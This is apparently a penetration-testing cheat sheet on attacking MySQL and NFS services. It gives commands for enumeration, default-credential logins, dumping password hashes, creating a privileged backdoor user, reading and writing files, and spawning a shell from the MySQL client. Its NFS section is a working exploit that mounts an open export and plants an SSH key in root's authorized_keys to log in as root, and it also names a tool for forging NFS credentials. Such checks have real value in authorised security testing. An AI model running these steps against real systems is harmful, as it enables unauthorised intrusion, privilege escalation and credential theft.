MYSQL (3306)
  • Enumeration
    • nmap -A -n -p3306 <IP Address>
    • nmap -A -n -PN –script:ALL -p3306 <IP Address>
    • telnet IP_Address 3306
    • use test; select * from test;
    • To check for other DB’s — show databases
  • Administration
  • Manual Checks
    • Default usernames and passwords
      • username: root password:
      • testing
        • mysql -h <Hostname> -u root
        • mysql -h <Hostname> -u root
        • mysql -h <Hostname> -u root@localhost
        • mysql -h <Hostname>
        • mysql -h <Hostname> -u “”@localhost
    • Configuration Files
      • Operating System
        • windows
          • config.ini
          • my.ini
            • windows\my.ini
            • winnt\my.ini
          • <InstDir>/mysql/data/
        • unix
          • my.cnf
            • /etc/my.cnf
            • /etc/mysql/my.cnf
            • /var/lib/mysql/my.cnf
            • ~/.my.cnf
            • /etc/my.cnf
      • Command History
        • ~/.mysql.history
      • Log Files
        • connections.log
        • update.log
        • common.log
      • To run many sql commands at once — mysql -u username -p < manycommands.sql
      • MySQL data directory (Location specified in my.cnf)
        • Parent dir = data directory
        • mysql
        • test
        • information_schema (Key information in MySQL)
          • Complete table list — select table_schema,table_name from tables;
          • Exact privileges — select grantee, table_schema, privilege_type FROM schema_privileges;
          • File privileges — select user,file_priv from mysql.user where user=’root’;
          • Version — select version();
          • Load a specific file — SELECT LOAD_FILE(‘FILENAME’);
      • SSL Check
        • mysql> show variables like ‘have_openssl’;
          • If there’s no rows returned at all it means the the distro itself doesn’t support SSL connections and probably needs to be recompiled. If its disabled it means that the service just wasn’t started with ssl and can be easily fixed.
    • Privilege Escalation
      • Current Level of access
        • mysql>select user();
        • mysql>select user,password,create_priv,insert_priv,update_priv,alter_priv,delete_priv,drop_priv from user where user=’OUTPUT OF select user()’;
      • Access passwords
        • mysql> use mysql
        • mysql> select user,password from user;
      • Create a new user and grant him privileges
        • mysql>create user test identified by ‘test’;
        • mysql> grant SELECT,CREATE,DROP,UPDATE,DELETE,INSERT on *.* to mysql identified by ‘mysql’ WITH GRANT OPTION;
      • Break into a shell
        • mysql> \! cat /etc/passwd
        • mysql> \! bash
  • SQL injection
    • mysql-miner.pl
      • mysql-miner.pl https://target/ expected_string database
    • https://www.imperva.com/resources/adc/sql_injection_signatures_evasion.html
    • https://www.justinshattuck.com/2007/01/18/mysql-injection-cheat-sheet/
  • References.
    • Design Weaknesses
      • MySQL running as root
      • Exposed publicly on Internet
    • https://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=mysql
    • https://search.securityfocus.com/swsearch?sbm=%2F&metaname=alldoc&query=mysql&x=0&y=0

Useful SQL Commands

Show Current Permissions

SHOW GRANTS FOR 'user'@'%';

Set Privilege for File Access

GRANT FILE ON . to 'user'@'%'; FLUSH PRIVILEGES;

Write Files

select 'content' INTO outfile 'path';

Read Files

select load_file('path_to_file');
NFS (2049)

In default configurations, the remote NFS server will map the UID/GID of the connecting user. For example, if ‘int0x33’ is my local user account, and /etc/passwd and /etc/group have assigned me a uid and gid of 3333, then on connecting to a remote NFS share, I’ll have access as that same uid and gid on the remote system, regardless of what username is assigned to it, this includes root.

Enumeration

root@box:~# rpcinfo -p 10.10.10.10
# All Mount Points
root@box:~# showmount -a 10.10.10.10
# Export List
root@box:~# showmount -e 10.10.10.10
# Directories
root@box:~# showmount -d 10.10.10.10
# Hosts
root@box:~# showmount 10.10.10.10

Exploit It

root@box:~# ssh-keygen
root@box:~# mkdir /tmp/r00t
root@box:~# mount -t nfs 10.10.10.10:/ /tmp/r00t/
root@box:~# cat ~/.ssh/id_rsa.pub >> /tmp/r00t/root/.ssh/authorized_keys
root@box:~# umount /tmp/r00t
root@box:~# ssh root@10.10.10.10

Configuration Files

  • /etc/exports
  • /etc/lib/nfs/xtab

NfSpy

https://github.com/int0x33/NfSpy

NfSpy is a Python library for automating the falsification of NFS credentials when mounting an NFS share. Included are two client programs:

  • nfspy uses the Filesystem in Userspace (FUSE) library to mount an NFS share in Linux. This allows the use of any regular file-searching and manipulation programs like grep and find to explore the NFS export.
  • nfspysh is a ftp-like interactive shell for exploring NFS exports. It does not require the FUSE library, so it can run on non-Linux platforms.

ORACLE (1521)